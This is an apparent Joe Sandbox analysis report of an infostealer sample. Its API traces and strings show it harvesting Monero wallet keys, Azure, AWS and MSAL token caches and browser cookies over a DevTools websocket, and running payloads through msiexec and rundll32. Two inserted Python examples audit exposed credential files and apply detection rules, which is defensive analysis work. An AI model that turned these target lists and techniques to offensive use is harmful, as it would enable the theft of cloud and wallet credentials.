                                         • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                        • String ID:
                                        • API String ID: 1956182324-0
                                        • Opcode ID: 65b58ffea2e066ef108e8a6f130e8e9e09efb72b2c303e48da0e44261e2d6908
                                        • Instruction ID: f280726b9bde6b47a9549f153b8bbce772c37dc1eaf5420a250d4ca1b6633824
                                        • Opcode Fuzzy Hash: 65b58ffea2e066ef108e8a6f130e8e9e09efb72b2c303e48da0e44261e2d6908
                                        • Instruction Fuzzy Hash: 62E16171910118ABCB18EBA0ED96EEE77B9AF14701F0455A8F10776091DF36AE48CB62
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,01A8D720,00000000,?,00E31544,00000000,?,?), ref: 00E1CB6C
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00E1CB89
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00E1CB95
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E1CBA8
                                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00E1CBD9
                                        • StrStrA.SHLWAPI(?,01A8D768,00E30B56), ref: 00E1CBF7
                                        • StrStrA.SHLWAPI(00000000,01A8D780), ref: 00E1CC1E
                                        • StrStrA.SHLWAPI(?,01A8DB58,00000000,?,00E31550,00000000,?,00000000,00000000,?,01A889B8,00000000,?,00E3154C,00000000,?), ref: 00E1CDA2
                                        • StrStrA.SHLWAPI(00000000,01A8D958), ref: 00E1CDB9
                                          • Part of subcall function 00E1C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E1C971
                                          • Part of subcall function 00E1C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E1C97C
                                        • StrStrA.SHLWAPI(?,01A8D958,00000000,?,00E31554,00000000,?,00000000,01A889E8), ref: 00E1CE5A
                                        • StrStrA.SHLWAPI(00000000,01A88BC8), ref: 00E1CE71
                                          • Part of subcall function 00E1C920: lstrcat.KERNEL32(?,00E30B47), ref: 00E1CA43
                                          • Part of subcall function 00E1C920: lstrcat.KERNEL32(?,00E30B4B), ref: 00E1CA57
                                          • Part of subcall function 00E1C920: lstrcat.KERNEL32(?,00E30B4E), ref: 00E1CA78
                                        • lstrlen.KERNEL32(00000000), ref: 00E1CF44
                                        • CloseHandle.KERNEL32(00000000), ref: 00E1CF9C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                        • String ID:
                                        • API String ID: 3744635739-3916222277
                                        • Opcode ID: 51682b807eee72199b4968c65bc350c0ff7801a122bd6d51733c6f5719be6b21
                                        • Instruction ID: 9509e538a72e758837b3cf97be02593a62562a426afa59b1b5583bbf77883da4
                                        • Opcode Fuzzy Hash: 51682b807eee72199b4968c65bc350c0ff7801a122bd6d51733c6f5719be6b21
                                        • Instruction Fuzzy Hash: 40E12D71900118ABCB14EBA4ECA2FEEB7B9BF14300F0855A9F10677191EF356A49CB61
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                        • RegOpenKeyExA.ADVAPI32(00000000,01A8B8C0,00000000,00020019,00000000,00E305BE), ref: 00E28534
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00E285B6
                                        • wsprintfA.USER32 ref: 00E285E9
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00E2860B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00E2861C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00E28629
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                                        • String ID: - $%s\%s$?
                                        • API String ID: 3246050789-3278919252
                                        • Opcode ID: 1171867759ab89ade8fb7c755c7fa5c9c7194ff520f7ab7c6ea4a9a29ee5e94d
                                        • Instruction ID: 2ffef9a5ff27d15fdfcde931bb0eed231ed1230d683cb509dda854d4c3bded9d
                                        • Opcode Fuzzy Hash: 1171867759ab89ade8fb7c755c7fa5c9c7194ff520f7ab7c6ea4a9a29ee5e94d
                                        • Instruction Fuzzy Hash: 2E814D71911228ABDB24DB54DD95FEAB7B8BF08700F1486D8F10AB6140DF356B84CFA0
                                        APIs
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E291FC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateGlobalStream
                                        • String ID: `d$`d$image/jpeg
                                        • API String ID: 2244384528-3402243820
                                        • Opcode ID: 75a2c062804eda6022ab88d66a88a527b98bca98fe7f725cffddc4c8eed43a3a
                                        • Instruction ID: 05046da780f2df1c6af0f39bea6ca81dae0e2eb2fa2019032268b48eefb3a7fe
                                        • Opcode Fuzzy Hash: 75a2c062804eda6022ab88d66a88a527b98bca98fe7f725cffddc4c8eed43a3a
                                        • Instruction Fuzzy Hash: F4711071900218EBDB14DFE5E885FEEB7B9BF48700F109548F656AB284DB35E944CB60
                                        APIs
                                          • Part of subcall function 00E28F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E28F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E25000
                                        • lstrcat.KERNEL32(?,\.azure\), ref: 00E2501D
                                          • Part of subcall function 00E24B60: wsprintfA.USER32 ref: 00E24B7C
                                          • Part of subcall function 00E24B60: FindFirstFileA.KERNEL32(?,?), ref: 00E24B93
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E2508C
                                        • lstrcat.KERNEL32(?,\.aws\), ref: 00E250A9
                                          • Part of subcall function 00E24B60: StrCmpCA.SHLWAPI(?,00E30FC4), ref: 00E24BC1
                                          • Part of subcall function 00E24B60: StrCmpCA.SHLWAPI(?,00E30FC8), ref: 00E24BD7
                                          • Part of subcall function 00E24B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00E24DCD
                                          • Part of subcall function 00E24B60: FindClose.KERNEL32(000000FF), ref: 00E24DE2
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E25118
                                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00E25135
                                          • Part of subcall function 00E24B60: wsprintfA.USER32 ref: 00E24C00
                                          • Part of subcall function 00E24B60: StrCmpCA.SHLWAPI(?,00E308D3), ref: 00E24C15
                                          • Part of subcall function 00E24B60: wsprintfA.USER32 ref: 00E24C32
                                          • Part of subcall function 00E24B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00E24C6E
                                          • Part of subcall function 00E24B60: lstrcat.KERNEL32(?,01A8F1D8), ref: 00E24C9A
                                          • Part of subcall function 00E24B60: lstrcat.KERNEL32(?,00E30FE0), ref: 00E24CAC
                                          • Part of subcall function 00E24B60: lstrcat.KERNEL32(?,?), ref: 00E24CC0
                                          • Part of subcall function 00E24B60: lstrcat.KERNEL32(?,00E30FE4), ref: 00E24CD2
                                          • Part of subcall function 00E24B60: lstrcat.KERNEL32(?,?), ref: 00E24CE6
                                          • Part of subcall function 00E24B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00E24CFC
                                          • Part of subcall function 00E24B60: DeleteFileA.KERNEL32(?), ref: 00E24D81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                        • API String ID: 949356159-974132213
                                        • Opcode ID: 3c33fb6355eada75e15fc3af9b3453d91e12351e25553bb4ec7f37791cae2232
                                        • Instruction ID: 03d6a077507c726f7f4fdb42519b30857c286814bd4f54e69b16e7348c34f2cd
                                        • Opcode Fuzzy Hash: 3c33fb6355eada75e15fc3af9b3453d91e12351e25553bb4ec7f37791cae2232
                                        • Instruction Fuzzy Hash: 2C41D6BAA4031867DB24E760ED5BFED37685B50700F001498B689760C1EEB56BC8CB92
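The record above shows the walker resolving a base folder with SHGetFolderPathA, appending \.azure\, \.aws\ and \.IdentityService\, then enumerating with FindFirstFileA/FindNextFileA, matching names with PathMatchSpecA (msal.cache for the MSAL token cache, *.* for the two CLI folders) and copying what matches. The following is an added example, not code from the sample or from Joe Sandbox: a read-only host audit that lists which of those artefacts exist, so a responder knows what a run of this sample would have collected. The folder names and patterns are the string arguments in the trace; the root folder (one subcall resolves CSIDL 0x1C, CSIDL_LOCAL_APPDATA, while Azure CLI and AWS CLI normally keep their files under the profile root) and the recursive walk are assumptions, so both roots are checked.

```python
"""Host-side audit of the cloud-credential locations the walker above targets.

Added example; not code from the sample or from Joe Sandbox. Folder names and
patterns come from the API trace. Assumptions: the stealer may prepend either
%LOCALAPPDATA% (CSIDL 0x1C seen in one subcall) or the profile root, and the
FindFirstFileA/FindNextFileA loop recurses into subfolders.
"""
import fnmatch
import os
from typing import Dict, Iterator, List, Optional, Tuple

# folder -> file patterns; labels mirror the "Azure\<folder>" strings the
# sample uses when it files the stolen copies.
TARGETS: Dict[str, List[str]] = {
    ".azure": ["*.*"],                    # Azure CLI profile and token cache
    ".aws": ["*.*"],                      # AWS CLI credentials and config
    ".IdentityService": ["msal.cache"],   # MSAL token cache
}


def _matches(name: str, pattern: str) -> bool:
    # Win32 "*.*" matches every file name (PathMatchSpecA semantics),
    # unlike POSIX fnmatch, so it is special-cased.
    return pattern == "*.*" or fnmatch.fnmatch(name.lower(), pattern.lower())


def classify(relpath: str) -> Optional[str]:
    """Label a path relative to a root the way the stealer would, or None.

    The first path component must be one of TARGETS and the file name must
    match one of that folder's patterns. Either separator is accepted.
    """
    parts = [p for p in relpath.replace("\\", "/").split("/") if p]
    if len(parts) < 2:
        return None
    folder, name = parts[0], parts[-1]
    patterns = TARGETS.get(folder)
    if not patterns or not any(_matches(name, p) for p in patterns):
        return None
    return "Azure\\" + folder


def candidate_roots() -> List[str]:
    """Existing, de-duplicated roots to check (assumption: both may apply)."""
    roots: List[str] = []
    for c in (os.environ.get("LOCALAPPDATA"), os.environ.get("USERPROFILE"),
              os.path.expanduser("~")):
        if c and os.path.isdir(c) and c not in roots:
            roots.append(c)
    return roots


def find_cloud_credentials(roots: Optional[List[str]] = None
                           ) -> Iterator[Tuple[str, str, int]]:
    """Yield (label, absolute path, size) for every file the loop would copy."""
    for root in (roots if roots is not None else candidate_roots()):
        for folder in TARGETS:
            top = os.path.join(root, folder)
            if not os.path.isdir(top):
                continue
            for dirpath, _, files in os.walk(top):   # recursion is an assumption
                for name in files:
                    full = os.path.join(dirpath, name)
                    label = classify(os.path.relpath(full, root))
                    if label:
                        yield label, full, os.path.getsize(full)


if __name__ == "__main__":
    for label, path, size in find_cloud_credentials():
        print(f"{label:<24} {size:>8}  {path}")
```

Run it as the affected user; anything it prints is material the sample's CopyFileA loop would have staged for exfiltration, and the Azure CLI and AWS CLI files in particular should be treated as exposed and rotated rather than merely cleaned up.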
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00E23415
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00E235AD
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00E2373A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExecuteShell$lstrcpy
                                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                        • API String ID: 2507796910-3625054190
                                        • Opcode ID: 6ac1093450bc7c74201788577db4549bcbe3cb2909fa5bde860c90c056cc1d9c
                                        • Instruction ID: 1871503af8ba9184227012bd485b55766135ffdf3db5ab13630afc6fe7099632
                                        • Opcode Fuzzy Hash: 6ac1093450bc7c74201788577db4549bcbe3cb2909fa5bde860c90c056cc1d9c
                                        • Instruction Fuzzy Hash: 10120E719101289BCB14EBA0EDA2FEEB7B9AF14300F4855A9F50776191EF342B49CF61
                                        APIs
                                          • Part of subcall function 00E19A50: InternetOpenA.WININET(00E30AF6,00000001,00000000,00000000,00000000), ref: 00E19A6A
                                        • lstrcat.KERNEL32(?,cookies), ref: 00E19CAF
                                        • lstrcat.KERNEL32(?,00E312C4), ref: 00E19CC1
                                        • lstrcat.KERNEL32(?,?), ref: 00E19CD5
                                        • lstrcat.KERNEL32(?,00E312C8), ref: 00E19CE7
                                        • lstrcat.KERNEL32(?,?), ref: 00E19CFB
                                        • lstrcat.KERNEL32(?,.txt), ref: 00E19D0D
                                        • lstrlen.KERNEL32(00000000), ref: 00E19D17
                                        • lstrlen.KERNEL32(00000000), ref: 00E19D26
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
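The ShellExecuteEx record above (msiexec.exe with /i "..." /passive, rundll32.exe with a .dll), the cloud-credential walker, and this cookie function (InternetOpenA plus the strings ws://localhost:9229, /devtools and cookies) each leave a distinctive combination of API names and string IDs. The following is an added example, not part of the report and not a Joe Sandbox signature: a small parser for the bullet format used in these records ("API.DLL(args), ref: addr", optionally prefixed with "Part of subcall function ...:", and the $-joined "String ID:" line) plus three triage rules keyed on those combinations. The sample input is copied from records on this page; the rule names and the evidence each rule requires are this example's choice.

```python
"""Triage of Joe Sandbox 'APIs' / 'String ID' records into behaviours.

Added example; not part of the report or of Joe Sandbox. The parser handles
the bullet format of these records; the three rules use indicators visible in
the ShellExecuteEx, cloud-credential and cookie records. Rule names and
required evidence are this example's choice, not Joe Sandbox signatures.
"""
import re
from typing import Dict, List, Set, Tuple

API_RE = re.compile(
    r"(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<dll>\w+)"            # e.g. ShellExecuteEx.SHELL32
    r"(?:\((?P<args>[^)]*)\))?"              # arguments, absent for wsprintfA
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"     # call-site address
)


def parse_record(text: str) -> Tuple[List[Dict[str, object]], List[str]]:
    """Return (api calls, string IDs) from one record's bullet lines."""
    apis: List[Dict[str, object]] = []
    strings: List[str] = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line.startswith("String ID:"):
            # Joe Sandbox joins a function's string references with '$'
            body = line[len("String ID:"):].strip()
            strings.extend(s for s in body.split("$") if s)
            continue
        m = API_RE.search(line)
        if m:
            args = m.group("args") or ""
            apis.append({"api": m.group("api"), "dll": m.group("dll"),
                         "args": [a for a in args.split(",") if a],
                         "ref": m.group("ref"),
                         "subcall": line.startswith("Part of subcall")})
    return apis, strings


def _present(strings: List[str], *needles: str) -> Set[str]:
    """Subset of needles that occur (case-insensitively) in any string ID."""
    low = [s.lower() for s in strings]
    return {n for n in needles if any(n.lower() in s for s in low)}


def triage(text: str) -> List[Tuple[str, List[str]]]:
    """Apply the behaviour rules; returns (rule, sorted evidence) pairs."""
    apis, strings = parse_record(text)
    names = {str(a["api"]) for a in apis}
    hits: List[Tuple[str, List[str]]] = []
    # 1. Payload execution through installer / loader LOLBins via ShellExecuteEx
    lolbins = _present(strings, "msiexec.exe", "rundll32.exe")
    if "ShellExecuteEx" in names and lolbins:
        hits.append(("exec_via_installer_lolbin",
                     sorted(lolbins | _present(strings, '/i "', "/passive"))))
    # 2. Cookie collection over a local DevTools websocket
    devtools = _present(strings, "ws://localhost:", "/devtools", "cookies")
    if len(devtools) == 3:
        hits.append(("devtools_cookie_collection", sorted(devtools)))
    # 3. Cloud CLI / MSAL credential harvesting: directory walk plus copy
    cloud = _present(strings, "\\.aws\\", "\\.azure\\", "msal.cache")
    if cloud and {"FindFirstFileA", "CopyFileA"} & names:
        hits.append(("cloud_credential_harvest", sorted(cloud)))
    return hits


# Sample input: lines copied from records in this report.
EXEC_RECORD = r"""
  • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
• ShellExecuteEx.SHELL32(0000003C), ref: 00E23415
• ShellExecuteEx.SHELL32(0000003C), ref: 00E235AD
• ShellExecuteEx.SHELL32(0000003C), ref: 00E2373A
• API ID: ExecuteShell$lstrcpy
• String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
"""
COOKIE_RECORD = r"""
  • Part of subcall function 00E19A50: InternetOpenA.WININET(00E30AF6,00000001,00000000,00000000,00000000), ref: 00E19A6A
• lstrcat.KERNEL32(?,cookies), ref: 00E19CAF
• lstrcat.KERNEL32(?,.txt), ref: 00E19D0D
• lstrlen.KERNEL32(00000000), ref: 00E19D17
• String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
"""
CLOUD_RECORD = r"""
  • Part of subcall function 00E28F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E28F9B
• lstrcat.KERNEL32(?,\.azure\), ref: 00E2501D
  • Part of subcall function 00E24B60: wsprintfA.USER32 ref: 00E24B7C
  • Part of subcall function 00E24B60: FindFirstFileA.KERNEL32(?,?), ref: 00E24B93
• lstrcat.KERNEL32(?,\.aws\), ref: 00E250A9
  • Part of subcall function 00E24B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00E24C6E
  • Part of subcall function 00E24B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00E24CFC
• String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
"""
BENIGN_RECORD = r"""
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E291FC
• String ID: `d$`d$image/jpeg
"""

if __name__ == "__main__":
    for rec in (EXEC_RECORD, COOKIE_RECORD, CLOUD_RECORD, BENIGN_RECORD):
        print(triage(rec) or "no rule matched")
```

Rule 2 deliberately requires all three strings: "cookies" alone appears in many benign functions, and localhost websocket strings alone are common in Electron and Node tooling, but the three together with wininet in the same function are what make this record worth a closer look.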
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
